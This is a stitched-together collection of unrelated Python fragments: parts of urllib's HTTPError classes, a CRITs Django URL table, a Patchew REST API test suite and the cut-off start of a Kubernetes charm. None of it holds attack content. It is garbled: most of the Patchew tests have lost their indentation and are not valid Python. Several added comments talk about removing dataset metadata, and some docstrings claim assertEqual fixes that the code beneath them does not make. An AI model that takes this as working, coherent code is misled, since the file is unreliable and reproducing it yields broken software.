    def __init__(self, url, code, msg, hdrs, fp):
        self.code = code
        self.msg = msg
        self.hdrs = hdrs
        self.fp = fp
        self.filename = url
        # The error doubles as a file-like response object; when the server
        # sent no body, substitute an empty stream for the addinfourl base.
        if fp is None:
            fp = io.BytesIO()
        urllib.response.addinfourl.__init__(self, fp, hdrs, url, code)

    def __str__(self):
        return 'HTTP Error %s: %s' % (self.code, self.msg)

    def __repr__(self):
        return '<HTTPError %s: %r>' % (self.code, self.msg)

    # since URLError specifies a .reason attribute, HTTPError should also
    # provide this attribute. See issue13211 for discussion.
    @property
    def reason(self):
        return self.msg

    @property
    def headers(self):
        return self.hdrs

    @headers.setter
    def headers(self, headers):
        self.hdrs = headers
class ContentTooShortError(URLError):
    """Exception raised when downloaded size does not match content-length.

    Fix: the last line of this class carried stray dataset metadata
    ("| python | github | ..."), which is not valid Python; removed.
    """

    def __init__(self, message, content):
        URLError.__init__(self, message)
        # Keep the partially downloaded body so callers can inspect it.
        self.content = content
from django.conf.urls import patterns
# Route table for the crits raw_data app (legacy pre-Django-1.8 patterns()
# syntax: a 'crits.raw_data.views' prefix plus string view names).
# Fix: the closing line carried stray dataset metadata ("| unknown | ..."),
# which is not valid Python; removed.
urlpatterns = patterns('crits.raw_data.views',
    (r'^details/(?P<_id>\w+)/$', 'raw_data_details'),
    (r'^details_by_link/(?P<link>.+)/$', 'details_by_link'),
    (r'^get_inline_comments/(?P<_id>\w+)/$', 'get_inline_comments'),
    (r'^get_versions/(?P<_id>\w+)/$', 'get_raw_data_versions'),
    (r'^set_tool_details/(?P<_id>\w+)/$', 'set_raw_data_tool_details'),
    (r'^set_tool_name/(?P<_id>\w+)/$', 'set_raw_data_tool_name'),
    (r'^set_raw_data_type/(?P<_id>\w+)/$', 'set_raw_data_type'),
    (r'^set_raw_data_highlight_comment/(?P<_id>\w+)/$', 'set_raw_data_highlight_comment'),
    (r'^set_raw_data_highlight_date/(?P<_id>\w+)/$', 'set_raw_data_highlight_date'),
    (r'^add_inline_comment/(?P<_id>\w+)/$', 'add_inline_comment'),
    (r'^add_highlight/(?P<_id>\w+)/$', 'add_highlight'),
    (r'^remove_highlight/(?P<_id>\w+)/$', 'remove_highlight'),
    (r'^upload/(?P<link_id>.+)/$', 'upload_raw_data'),
    (r'^upload/$', 'upload_raw_data'),
    (r'^remove/(?P<_id>[\S ]+)$', 'remove_raw_data'),
    (r'^list/$', 'raw_data_listing'),
    (r'^list/(?P<option>\S+)/$', 'raw_data_listing'),
    (r'^add_data_type/$', 'new_raw_data_type'),
    (r'^get_data_types/$', 'get_raw_data_type_dropdown'),
)
#!/usr/bin/env python3
#
# Copyright 2018 Red Hat, Inc.
#
# Authors:
# Paolo Bonzini <pbonzini@redhat.com>
#
# This work is licensed under the MIT License. Please see the LICENSE file or
# http://opensource.org/licenses/MIT.
from collections import OrderedDict
import json
from django.contrib.auth.models import User
from api.models import Message
from api.rest import AddressSerializer
from .patchewtest import PatchewTestCase, main
try:
import coreapi
except ImportError:
coreapi = None
class RestTest(PatchewTestCase):
def setUp(self):
    # Fixtures: one superuser plus three projects — QEMU, a QEMU sub-project
    # ("QEMU Block Layer" with a "block" prefix tag) and an unrelated project
    # (EDK 2) — with their REST resource URIs cached for the assertions below.
    self.create_superuser()
    self.p = self.add_project("QEMU", "qemu-devel@nongnu.org")
    self.PROJECT_BASE = "%sprojects/%d/" % (self.REST_BASE, self.p.id)
    self.sp = self.add_project("QEMU Block Layer", "qemu-block@nongnu.org")
    self.sp.parent_project = self.p
    self.sp.prefix_tags = "block"
    self.sp.save()
    self.SUBPROJECT_BASE = "%sprojects/%d/" % (self.REST_BASE, self.sp.id)
    self.p2 = self.add_project("EDK 2", "edk2-devel@lists.01.org")
    self.PROJECT_BASE_2 = "%sprojects/%d/" % (self.REST_BASE, self.p2.id)
    self.admin = User.objects.get(username="admin")
    self.USER_BASE = "%susers/%d/" % (self.REST_BASE, self.admin.id)
def test_root(self):
    """The API root lists the top-level collections, honoring the Host header.

    Also switches the deprecated assertEquals alias to assertEqual.
    """
    resp = self.api_client.get(self.REST_BASE)
    self.assertEqual(resp.data["users"], self.REST_BASE + "users/")
    self.assertEqual(resp.data["projects"], self.REST_BASE + "projects/")
    self.assertEqual(resp.data["series"], self.REST_BASE + "series/")
    # Absolute URIs must be built from the request's Host header.
    resp = self.api_client.get(self.REST_BASE, HTTP_HOST="patchew.org")
    self.assertEqual(resp.data["users"], "http://patchew.org/api/v1/users/")
    self.assertEqual(resp.data["projects"], "http://patchew.org/api/v1/projects/")
    self.assertEqual(resp.data["series"], "http://patchew.org/api/v1/series/")
def test_users(self):
    """GET /users/ lists the single admin user created in setUp.

    Also switches the deprecated assertEquals alias to assertEqual.
    """
    resp = self.api_client.get(self.REST_BASE + "users/")
    self.assertEqual(resp.data["count"], 1)
    self.assertEqual(resp.data["results"][0]["resource_uri"], self.USER_BASE)
    self.assertEqual(resp.data["results"][0]["username"], self.admin.username)
def test_user(self):
    """GET on a single user resource returns its URI and username.

    Also switches the deprecated assertEquals alias to assertEqual.
    """
    resp = self.api_client.get(self.USER_BASE)
    self.assertEqual(resp.data["resource_uri"], self.USER_BASE)
    self.assertEqual(resp.data["username"], self.admin.username)
def test_projects(self):
    """GET /projects/ lists all three fixture projects; the sub-project
    carries a parent_project link back to QEMU."""
    resp = self.api_client.get(self.REST_BASE + "projects/")
    self.assertEquals(resp.data["count"], 3)
    self.assertEquals(resp.data["results"][0]["resource_uri"], self.PROJECT_BASE)
    self.assertEquals(resp.data["results"][0]["name"], "QEMU")
    self.assertEquals(
        resp.data["results"][0]["mailing_list"], "qemu-devel@nongnu.org"
    )
    self.assertEquals(resp.data["results"][1]["resource_uri"], self.SUBPROJECT_BASE)
    self.assertEquals(resp.data["results"][1]["name"], "QEMU Block Layer")
    self.assertEquals(
        resp.data["results"][1]["mailing_list"], "qemu-block@nongnu.org"
    )
    self.assertEquals(resp.data["results"][1]["parent_project"], self.PROJECT_BASE)
def test_project(self):
    """GET on single project resources returns their fields; the sub-project
    additionally exposes its parent_project link."""
    resp = self.api_client.get(self.PROJECT_BASE)
    self.assertEquals(resp.data["resource_uri"], self.PROJECT_BASE)
    self.assertEquals(resp.data["name"], "QEMU")
    self.assertEquals(resp.data["mailing_list"], "qemu-devel@nongnu.org")
    resp = self.api_client.get(self.SUBPROJECT_BASE)
    self.assertEquals(resp.data["resource_uri"], self.SUBPROJECT_BASE)
    self.assertEquals(resp.data["name"], "QEMU Block Layer")
    self.assertEquals(resp.data["mailing_list"], "qemu-block@nongnu.org")
    self.assertEquals(resp.data["parent_project"], self.PROJECT_BASE)
def test_project_by_name(self):
    """projects/by-name/<name>/ issues a 307 redirect to the canonical URI
    and preserves any query string.

    Also switches the deprecated assertEquals alias to assertEqual.
    """
    resp = self.api_client.get(self.REST_BASE + "projects/by-name/QEMU/")
    self.assertEqual(resp.status_code, 307)
    resp = self.api_client.get(resp["Location"])
    self.assertEqual(resp.data["resource_uri"], self.PROJECT_BASE)
    self.assertEqual(resp.data["name"], "QEMU")
    self.assertEqual(resp.data["mailing_list"], "qemu-devel@nongnu.org")
    resp = self.api_client.get(
        self.REST_BASE + "projects/by-name/QEMU/?some=thing&foo=bar"
    )
    self.assertEqual(resp.status_code, 307)
    self.assertIn("some=thing", resp["Location"])
    self.assertIn("foo=bar", resp["Location"])
def test_project_config_get(self):
    """Project config is readable only after authentication."""
    self.p.config = {"git": {"push_to": "/tmp/aaa"}}
    self.p.save()
    resp = self.api_client.get(self.PROJECT_BASE + "config/")
    self.assertEquals(resp.status_code, 401)  # anonymous: rejected
    self.api_client.login(username=self.user, password=self.password)
    resp = self.api_client.get(self.PROJECT_BASE + "config/")
    self.assertEquals(resp.status_code, 200)
    self.assertEquals(resp.data["git"]["push_to"], "/tmp/aaa")
def test_project_config_put(self):
    """PUT on config requires authentication; the new value is echoed back
    and persisted for subsequent GETs."""
    new_config = {"git": {"push_to": "/tmp/bbb"}}
    resp = self.api_client.put(
        self.PROJECT_BASE + "config/", new_config, format="json"
    )
    self.assertEquals(resp.status_code, 401)  # anonymous: rejected
    self.api_client.login(username=self.user, password=self.password)
    resp = self.api_client.put(
        self.PROJECT_BASE + "config/", new_config, format="json"
    )
    self.assertEquals(resp.status_code, 200)
    self.assertEquals(resp.data["git"]["push_to"], "/tmp/bbb")
    resp = self.api_client.get(self.PROJECT_BASE + "config/")
    self.assertEquals(resp.status_code, 200)
    self.assertEquals(resp.data["git"]["push_to"], "/tmp/bbb")
def test_update_project_head(self):
    """POST update_project_head marks the listed series as merged and moves
    the project's git head."""
    resp = self.apply_and_retrieve(
        "0001-simple-patch.mbox.gz",
        self.p.id,
        "20160628014747.20971-1-famz@redhat.com",
    )
    self.api_client.login(username=self.user, password=self.password)
    resp_before = self.api_client.get(
        self.PROJECT_BASE + "series/" + "20160628014747.20971-1-famz@redhat.com/"
    )
    data = {
        "message_ids": ["20160628014747.20971-1-famz@redhat.com"],
        "old_head": "None",
        "new_head": "000000",
    }
    resp = self.api_client.post(
        self.PROJECT_BASE + "update_project_head/",
        data=json.dumps(data),
        content_type="application/json",
    )
    resp_after = self.api_client.get(
        self.PROJECT_BASE + "series/" + "20160628014747.20971-1-famz@redhat.com/"
    )
    # The series flips from not-merged to merged once the head advances.
    self.assertEquals(resp_before.data["is_merged"], False)
    self.assertEquals(resp.status_code, 200)
    self.assertEquals(resp.data["count"], 1)
    self.assertEquals(resp.data["new_head"], "000000")
    self.assertEquals(resp_after.data["is_merged"], True)
def test_project_post_no_login(self):
    """Creating a project anonymously is rejected with 401.

    Also switches the deprecated assertEquals alias to assertEqual.
    """
    data = {"name": "keycodemapdb"}
    resp = self.api_client.post(self.REST_BASE + "projects/", data=data)
    self.assertEqual(resp.status_code, 401)
def test_project_post_minimal(self):
    """An authenticated POST with only a name creates the project, which is
    then retrievable via its returned resource URI."""
    data = {"name": "keycodemapdb"}
    self.api_client.login(username=self.user, password=self.password)
    resp = self.api_client.post(self.REST_BASE + "projects/", data=data)
    self.assertEquals(resp.status_code, 201)
    self.assertEquals(
        resp.data["resource_uri"].startswith(self.REST_BASE + "projects/"), True
    )
    self.assertEquals(resp.data["name"], data["name"])
    resp = self.api_client.get(resp.data["resource_uri"])
    self.assertEquals(resp.data["name"], data["name"])
def test_project_post(self):
self.api_client.login(username=self.user, password=self.password)
data = {
"name": "keycodemapdb",
"mailing_list": "qemu-devel@nongnu.org",
"prefix_tags": "keycodemapdb",
"url": "https://gitlab.com/keycodemap/keycodemapdb/",
"git": "https://gitlab.com/keycodemap/keycodemapdb/",
"description": "keycodemapdb generates code to translate key codes",
"display_order": 4321,
"parent_project": self.PROJECT_BASE,
}
resp = self.api_client.post(self.REST_BASE + "projects/", data=data)
self.assertEquals(resp.status_code, 201)
self.assertEquals(
resp.data["resource_uri"].startswith(self.REST_BASE + "projects/"), True
)
self.assertEquals(resp.data["name"], data["name"])
self.assertEquals(resp.data["mailing_list"], data["mailing_list"])
self.assertEquals(resp.data["prefix_tags"], data["prefix_tags"])
self.assertEquals(resp.data["url"], data["url"])
self.assertEquals(resp.data["git"], data["git"])
self.assertEquals(resp.data["description"], data["description"])
self.assertEquals(resp.data["display_order"], data["display_order"])
self.assertEquals(resp.data["logo"], None)
self.assertEquals(resp.data["parent_project"], self.PROJECT_BASE)
resp = self.api_client.get(resp.data["resource_uri"])
self.assertEquals(resp.data["name"], data["name"])
self.assertEquals(resp.data["mailing_list"], data["mailing_list"])
self.assertEquals(resp.data["prefix_tags"], data["prefix_tags"])
self.assertEquals(resp.data["url"], data["url"])
self.assertEquals(resp.data["git"], data["git"])
self.assertEquals(resp.data["description"], data["description"])
self.assertEquals(resp.data["display_order"], data["display_order"])
self.assertEquals(resp.data["logo"], None)
self.assertEquals(resp.data["parent_project"], self.PROJECT_BASE)
def test_project_results_list(self):
resp1 = self.api_client.get(self.PROJECT_BASE)
resp = self.api_client.get(resp1.data["results"])
self.assertEqual(resp.data["count"], len(resp.data["results"]))
def test_series_single(self):
resp = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH] quorum: Only compile when supported",
)
self.assertEqual(
resp.data["stripped_subject"], "quorum: Only compile when supported"
)
self.assertEqual(resp.data["is_complete"], True)
self.assertEqual(resp.data["total_patches"], 1)
self.assertEqual(len(resp.data["replies"]), 0)
self.assertEqual(len(resp.data["patches"]), 1)
self.assertEqual(resp.data["patches"][0]["subject"], resp.data["subject"])
self.assertEqual(
resp.data["patches"][0]["stripped_subject"], resp.data["stripped_subject"]
)
def test_series_multiple(self):
resp = self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["stripped_subject"],
"Report format specific info for LUKS block driver",
)
self.assertEqual(resp.data["is_complete"], True)
self.assertEqual(resp.data["total_patches"], 2)
self.assertEqual(len(resp.data["replies"]), 2)
self.assertEqual(len(resp.data["patches"]), 2)
self.assertEqual(
resp.data["replies"][0]["resource_uri"],
self.PROJECT_BASE + "messages/5792265A.5070507@redhat.com/",
)
self.assertEqual(
resp.data["replies"][0]["in_reply_to"],
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.assertEqual(
resp.data["replies"][0]["subject"],
"Re: [Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["replies"][1]["resource_uri"],
self.PROJECT_BASE
+ "messages/e0858c00-ccb6-e533-ee3e-9ba84ca45a7b@redhat.com/",
)
self.assertEqual(
resp.data["replies"][1]["in_reply_to"],
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.assertEqual(
resp.data["replies"][1]["subject"],
"Re: [Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["patches"][0]["resource_uri"],
self.PROJECT_BASE
+ "messages/1469192015-16487-2-git-send-email-berrange@redhat.com/",
)
self.assertEqual(
resp.data["patches"][0]["subject"],
"[Qemu-devel] [PATCH v4 1/2] crypto: add support for querying parameters for block encryption",
)
self.assertEqual(
resp.data["patches"][0]["stripped_subject"],
"crypto: add support for querying parameters for block encryption",
)
self.assertEqual(
resp.data["patches"][1]["resource_uri"],
self.PROJECT_BASE
+ "messages/1469192015-16487-3-git-send-email-berrange@redhat.com/",
)
self.assertEqual(
resp.data["patches"][1]["subject"],
"[Qemu-devel] [PATCH v4 2/2] block: export LUKS specific data to qemu-img info",
)
self.assertEqual(
resp.data["patches"][1]["stripped_subject"],
"block: export LUKS specific data to qemu-img info",
)
def test_series_incomplete(self):
resp = self.apply_and_retrieve(
"0012-incomplete-series.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["stripped_subject"],
"Report format specific info for LUKS block driver",
)
self.assertEqual(resp.data["is_complete"], False)
self.assertEqual(resp.data["total_patches"], 2)
self.assertEqual(len(resp.data["replies"]), 2)
self.assertEqual(len(resp.data["patches"]), 1)
self.assertEqual(
resp.data["patches"][0]["subject"],
"[Qemu-devel] [PATCH v4 1/2] crypto: add support for querying parameters for block encryption",
)
self.assertEqual(
resp.data["patches"][0]["stripped_subject"],
"crypto: add support for querying parameters for block encryption",
)
def test_series_list(self):
self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
resp = self.api_client.get(self.REST_BASE + "series/")
self.assertEqual(resp.data["count"], 2)
resp = self.api_client.get(self.PROJECT_BASE + "series/")
self.assertEqual(resp.data["count"], 2)
resp = self.api_client.get(self.REST_BASE + "projects/12345/series/")
self.assertEqual(resp.status_code, 404)
def test_series_results_list(self):
resp1 = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
resp = self.api_client.get(resp1.data["results"])
self.assertEqual(resp.data["count"], len(resp.data["results"]))
def test_series_search(self):
resp1 = self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
resp2 = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
resp = self.api_client.get(self.REST_BASE + "series/?q=quorum")
self.assertEqual(resp.data["count"], 1)
self.assertEqual(
resp.data["results"][0]["resource_uri"], resp2.data["resource_uri"]
)
self.assertEqual(resp.data["results"][0]["subject"], resp2.data["subject"])
self.assertEqual("replies" in resp.data["results"][0], False)
self.assertEqual("patches" in resp.data["results"][0], False)
resp = self.api_client.get(self.REST_BASE + "series/?q=project:QEMU")
self.assertEqual(resp.data["count"], 2)
self.assertEqual(
resp.data["results"][0]["resource_uri"], resp1.data["resource_uri"]
)
self.assertEqual(resp.data["results"][0]["subject"], resp1.data["subject"])
self.assertEqual("replies" in resp.data["results"][0], False)
self.assertEqual("patches" in resp.data["results"][0], False)
self.assertEqual(
resp.data["results"][1]["resource_uri"], resp2.data["resource_uri"]
)
self.assertEqual(resp.data["results"][1]["subject"], resp2.data["subject"])
self.assertEqual("replies" in resp.data["results"][1], False)
self.assertEqual("patches" in resp.data["results"][1], False)
resp = self.api_client.get(self.REST_BASE + "projects/12345/series/?q=quorum")
self.assertEqual(resp.status_code, 404)
resp = self.api_client.get(
self.REST_BASE + "projects/12345/series/?q=project:QEMU"
)
self.assertEqual(resp.status_code, 404)
def test_series_delete(self):
test_message_id = "1469192015-16487-1-git-send-email-berrange@redhat.com"
series = self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz", self.p.id, test_message_id
)
message = series.data["message"]
resp_before = self.api_client.get(
self.REST_BASE
+ "projects/"
+ str(self.p.id)
+ "/series/"
+ test_message_id
+ "/"
)
resp_reply_before = self.api_client.get(message + "replies/")
resp_without_login = self.api_client.delete(
self.REST_BASE
+ "projects/"
+ str(self.p.id)
+ "/series/"
+ test_message_id
+ "/"
)
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.delete(
self.REST_BASE
+ "projects/"
+ str(self.p.id)
+ "/series/"
+ test_message_id
+ "/"
)
self.api_client.logout()
resp_after = self.api_client.get(
self.REST_BASE
+ "projects/"
+ str(self.p.id)
+ "/series/"
+ test_message_id
+ "/"
)
resp_reply_after = self.api_client.get(message + "replies/")
self.assertEqual(resp_before.status_code, 200)
self.assertEqual(resp_reply_before.status_code, 200)
self.assertEqual(resp_without_login.status_code, 401)
self.assertEqual(resp.status_code, 204)
self.assertEqual(resp_after.status_code, 404)
self.assertEqual(resp_reply_after.status_code, 404)
def test_create_message(self):
dp = self.get_data_path("0022-another-simple-patch.json.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="application/json"
)
self.assertEqual(resp.status_code, 201)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20171023201055.21973-11-andrew.smirnov@gmail.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH v2 10/27] imx_fec: Reserve full 4K "
"page for the register file",
)
def test_patch_message(self):
the_tags = ["Reviewed-by: Paolo Bonzini <pbonzini@redhat.com"]
dp = self.get_data_path("0022-another-simple-patch.json.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="application/json"
)
self.assertEqual(resp.status_code, 201)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20171023201055.21973-11-andrew.smirnov@gmail.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(resp_get.data["tags"], [])
resp = self.api_client.patch(
self.PROJECT_BASE
+ "messages/20171023201055.21973-11-andrew.smirnov@gmail.com/",
{"tags": the_tags},
)
self.assertEqual(resp.status_code, 200)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20171023201055.21973-11-andrew.smirnov@gmail.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(resp_get.data["tags"], the_tags)
def test_create_text_message(self):
dp = self.get_data_path("0004-multiple-patch-reviewed.mbox.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/1469192015-16487-1-git-send-email-berrange@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp.data["subject"],
"[Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
def test_patch_series(self):
dp = self.get_data_path("0001-simple-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
resp = self.api_client.patch(
self.PROJECT_BASE + "series/20160628014747.20971-1-famz@redhat.com/",
{"is_tested": True},
)
self.assertEqual(resp.status_code, 200)
resp_get = self.api_client.get(
self.PROJECT_BASE + "series/20160628014747.20971-1-famz@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertTrue(resp_get.data["is_tested"])
def test_create_message_without_project_pk(self):
dp = self.get_data_path("0024-multiple-project-patch.json.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="application/json"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 2)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp_get.data["subject"],
"[Qemu-devel] [PATCH 1/7] SecurityPkg/Tcg2Pei: drop Tcg2PhysicalPresenceLib dependency",
)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 200)
def test_create_text_message_without_project_pk(self):
dp = self.get_data_path("0023-multiple-project-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
self.api_client.login(username=self.user, password=self.password)
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 2)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp_get.data["subject"],
"[Qemu-devel] [PATCH 1/7] SecurityPkg/Tcg2Pei: drop Tcg2PhysicalPresenceLib dependency",
)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 200)
def test_without_login_create_message(self):
dp = self.get_data_path("0022-another-simple-patch.json.gz")
with open(dp, "r") as f:
data = f.read()
resp = self.api_client.post(
self.PROJECT_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 401)
def test_non_maintainer_create_message(self):
self.create_user(username="test", password="userpass")
self.api_client.login(username="test", password="userpass")
dp = self.get_data_path("0023-multiple-project-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 0)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 404)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 404)
def test_maintainer_create_message(self):
test = self.create_user(username="test", password="userpass")
self.api_client.login(username="test", password="userpass")
self.p.maintainers = (test,)
dp = self.get_data_path("0023-multiple-project-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 1)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 404)
def test_importer_create_message(self):
dp = self.get_data_path("0023-multiple-project-patch.mbox.gz")
with open(dp, "r") as f:
data = f.read()
self.create_user(username="test", password="userpass", groups=["importers"])
self.api_client.login(username="test", password="userpass")
resp = self.api_client.post(
self.REST_BASE + "messages/", data, content_type="message/rfc822"
)
self.assertEqual(resp.status_code, 201)
self.assertEqual(resp.data["count"], 2)
resp_get = self.api_client.get(
self.PROJECT_BASE
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get.status_code, 200)
self.assertEqual(
resp_get.data["subject"],
"[Qemu-devel] [PATCH 1/7] SecurityPkg/Tcg2Pei: drop Tcg2PhysicalPresenceLib dependency",
)
resp_get2 = self.api_client.get(
self.PROJECT_BASE_2
+ "messages/20180223132311.26555-2-marcandre.lureau@redhat.com/"
)
self.assertEqual(resp_get2.status_code, 200)
def test_message(self):
series = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
message = series.data["patches"][0]["resource_uri"]
resp = self.api_client.get(message)
self.assertEqual(resp.data["mbox"], Message.objects.all()[0].get_mbox())
def test_message_mbox(self):
series = self.apply_and_retrieve(
"0001-simple-patch.mbox.gz",
self.p.id,
"20160628014747.20971-1-famz@redhat.com",
)
message = series.data["patches"][0]["resource_uri"]
resp = self.client.get(message + "mbox/")
self.assertEqual(resp.data, Message.objects.all()[0].get_mbox())
def test_address_serializer(self):
data1 = {"name": "Shubham", "address": "shubhamjain7495@gmail.com"}
serializer1 = AddressSerializer(data=data1)
valid1 = serializer1.is_valid()
valid_data1 = serializer1.validated_data
data2 = {"name": 123, "address": "shubhamjain7495@gmail.com"}
serializer2 = AddressSerializer(data=data2)
valid2 = serializer2.is_valid()
valid_data2 = serializer2.validated_data
self.assertEqual(valid1, True)
self.assertEqual(
valid_data1,
OrderedDict(
[("name", "Shubham"), ("address", "shubhamjain7495@gmail.com")]
),
)
self.assertEqual(valid2, True)
self.assertEqual(
valid_data2,
OrderedDict([("name", "123"), ("address", "shubhamjain7495@gmail.com")]),
)
def test_message_replies(self):
series = self.apply_and_retrieve(
"0004-multiple-patch-reviewed.mbox.gz",
self.p.id,
"1469192015-16487-1-git-send-email-berrange@redhat.com",
)
message = series.data["message"]
resp = self.api_client.get(message + "replies/")
self.assertEqual(resp.data["count"], 4)
self.assertEqual(
resp.data["results"][0]["resource_uri"],
self.PROJECT_BASE
+ "messages/1469192015-16487-2-git-send-email-berrange@redhat.com/",
)
self.assertEqual(
resp.data["results"][0]["subject"],
"[Qemu-devel] [PATCH v4 1/2] crypto: add support for querying parameters for block encryption",
)
self.assertEqual(
resp.data["results"][1]["resource_uri"],
self.PROJECT_BASE
+ "messages/1469192015-16487-3-git-send-email-berrange@redhat.com/",
)
self.assertEqual(
resp.data["results"][1]["subject"],
"[Qemu-devel] [PATCH v4 2/2] block: export LUKS specific data to qemu-img info",
)
self.assertEqual(
resp.data["results"][2]["resource_uri"],
self.PROJECT_BASE + "messages/5792265A.5070507@redhat.com/",
)
self.assertEqual(
resp.data["results"][2]["subject"],
"Re: [Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
self.assertEqual(
resp.data["results"][3]["resource_uri"],
self.PROJECT_BASE
+ "messages/e0858c00-ccb6-e533-ee3e-9ba84ca45a7b@redhat.com/",
)
self.assertEqual(
resp.data["results"][3]["subject"],
"Re: [Qemu-devel] [PATCH v4 0/2] Report format specific info for LUKS block driver",
)
def test_schema(self):
resp = self.api_client.get(self.REST_BASE + "schema/")
self.assertEqual(resp.status_code, 200)
# Allow running this test module directly.
if __name__ == "__main__":
    main()
#!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from charms import layer
from charms.reactive import hook
from charms.reactive import is_state
from charms.reactive import remove_state
from charms.reactive import set_state
from charms.reactive import when
from charms.reactive import when_not
from charmhelpers.core import hookenv
from shlex import split
from subprocess import call
from subprocess import check_call
from subprocess import check_output
@hook('upgrade-charm')
def reset_delivery_states():
    ''' Hook run on charm upgrade: clear the installed flag so the new
